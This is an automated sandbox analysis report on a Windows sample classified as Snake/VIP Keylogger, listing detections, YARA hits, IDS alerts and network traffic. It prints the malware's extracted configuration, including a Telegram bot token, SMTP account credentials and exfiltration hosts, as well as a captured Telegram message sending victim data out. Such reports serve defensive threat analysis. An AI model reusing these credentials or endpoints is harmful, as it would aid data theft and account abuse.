Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
n8l3NmC5EH.exe

Overview

General Information

Sample name:n8l3NmC5EH.exe
renamed because original name is a hash value
Original sample name:616f692b5adbb3cd0beb80a87f9ca3baf91f44d4c979ef27d4ea1e909de8125a.exe
Analysis ID:1632422
MD5:7610a54bb35521b14064bb562d1c6afc
SHA1:d1fa4d2715e348bf1eb3e13fcab31e7e65c9f4b0
SHA256:616f692b5adbb3cd0beb80a87f9ca3baf91f44d4c979ef27d4ea1e909de8125a
Tags:exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • n8l3NmC5EH.exe (PID: 7500 cmdline: "C:\Users\user\Desktop\n8l3NmC5EH.exe" MD5: 7610A54BB35521B14064BB562D1C6AFC)
    • n8l3NmC5EH.exe (PID: 7632 cmdline: "C:\Users\user\Desktop\n8l3NmC5EH.exe" MD5: 7610A54BB35521B14064BB562D1C6AFC)
    • n8l3NmC5EH.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\n8l3NmC5EH.exe" MD5: 7610A54BB35521B14064BB562D1C6AFC)
    • n8l3NmC5EH.exe (PID: 3180 cmdline: "C:\Users\user\Desktop\n8l3NmC5EH.exe" MD5: 7610A54BB35521B14064BB562D1C6AFC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Bot Token": "7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk", "Chat id": "7319393351", "Email ID": "accounts@ruchiraprinting.com", "Password": "Ruchira@PR12", "Host": "mail.ruchiraprinting.com", "Port": "587"}
{"Exfil Mode": "Telegram", "Username": "accounts@ruchiraprinting.com", "Password": "Ruchira@PR12", "Host": "mail.ruchiraprinting.com", "Port": "587", "Token": "7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk", "Chat_id": "7319393351", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d891:$a1: get_encryptedPassword
        • 0x2dbba:$a2: get_encryptedUsername
        • 0x2d6a1:$a3: get_timePasswordChanged
        • 0x2d7aa:$a4: get_passwordField
        • 0x2d8a7:$a5: set_encryptedPassword
        • 0x2ef80:$a7: get_logins
        • 0x2eee3:$a10: KeyLoggerEventArgs
        • 0x2eb48:$a11: KeyLoggerEventArgsEventHandler
        00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 13 entries
          SourceRuleDescriptionAuthorStrings
          3.2.n8l3NmC5EH.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            3.2.n8l3NmC5EH.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              3.2.n8l3NmC5EH.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                3.2.n8l3NmC5EH.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2da91:$a1: get_encryptedPassword
                • 0x2ddba:$a2: get_encryptedUsername
                • 0x2d8a1:$a3: get_timePasswordChanged
                • 0x2d9aa:$a4: get_passwordField
                • 0x2daa7:$a5: set_encryptedPassword
                • 0x2f180:$a7: get_logins
                • 0x2f0e3:$a10: KeyLoggerEventArgs
                • 0x2ed48:$a11: KeyLoggerEventArgsEventHandler
                3.2.n8l3NmC5EH.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3b8f7:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x3af9a:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x3b1f7:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3bbd6:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 23 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T23:34:25.474834+010028033053Unknown Traffic192.168.2.549696104.21.96.1443TCP
                2025-03-07T23:34:36.548086+010028033053Unknown Traffic192.168.2.549704104.21.96.1443TCP
                2025-03-07T23:34:44.604278+010028033053Unknown Traffic192.168.2.549715104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T23:34:20.460325+010028032742Potentially Bad Traffic192.168.2.549694193.122.130.080TCP
                2025-03-07T23:34:23.163473+010028032742Potentially Bad Traffic192.168.2.549694193.122.130.080TCP
                2025-03-07T23:34:26.007258+010028032742Potentially Bad Traffic192.168.2.549697193.122.130.080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T23:34:46.867269+010018100071Potentially Bad Traffic192.168.2.549716149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: n8l3NmC5EH.exeAvira: detected
                Source: 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Bot Token": "7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk", "Chat id": "7319393351", "Email ID": "accounts@ruchiraprinting.com", "Password": "Ruchira@PR12", "Host": "mail.ruchiraprinting.com", "Port": "587"}
                Source: 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "accounts@ruchiraprinting.com", "Password": "Ruchira@PR12", "Host": "mail.ruchiraprinting.com", "Port": "587", "Token": "7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk", "Chat_id": "7319393351", "Version": "4.4"}
                Source: n8l3NmC5EH.exeVirustotal: Detection: 75%Perma Link
                Source: n8l3NmC5EH.exeReversingLabs: Detection: 73%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: accounts@ruchiraprinting.com
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: Ruchira@PR12
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: mail.ruchiraprinting.com
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: stefano.clemente-memoryworld@wstceh.com
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: 587
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: 7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: 7319393351
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor:
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: accounts@ruchiraprinting.com
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: Ruchira@PR12
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: mail.ruchiraprinting.com
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: stefano.clemente-memoryworld@wstceh.com
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: 587
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: 7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: 7319393351
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor:
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: accounts@ruchiraprinting.com
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: Ruchira@PR12
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: mail.ruchiraprinting.com
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: stefano.clemente-memoryworld@wstceh.com
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: 587
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: 7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor: 7319393351
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpackString decryptor:

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: n8l3NmC5EH.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49695 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: n8l3NmC5EH.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: WOBv.pdbSHA256 source: n8l3NmC5EH.exe
                Source: Binary string: WOBv.pdb source: n8l3NmC5EH.exe
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 0107F45Dh3_2_0107F2C0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 0107F45Dh3_2_0107F4AC
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 0107FC19h3_2_0107F961
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A43308h3_2_06A42EF0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A42D41h3_2_06A42A90
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A43308h3_2_06A42EEB
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A4D919h3_2_06A4D670
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A4EA79h3_2_06A4E7D0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A4E1C9h3_2_06A4DF20
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A4F781h3_2_06A4F4D8
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A4EED1h3_2_06A4EC28
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A4D069h3_2_06A4CDC0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A4DD71h3_2_06A4DAC8
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A43308h3_2_06A43236
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A4D4C1h3_2_06A4D218
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A40D0Dh3_2_06A40B30
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A416F8h3_2_06A40B30
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A4E621h3_2_06A4E378
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A4F329h3_2_06A4F080
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06A40040
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 4x nop then jmp 06A4FBD9h3_2_06A4F930

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49716 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:29:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49697 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49694 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49696 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49704 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49715 -> 104.21.96.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49695 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:29:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:34:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: n8l3NmC5EH.exe, 00000003.00000002.3800131850.00000000065A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros;
                Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: n8l3NmC5EH.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20a
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
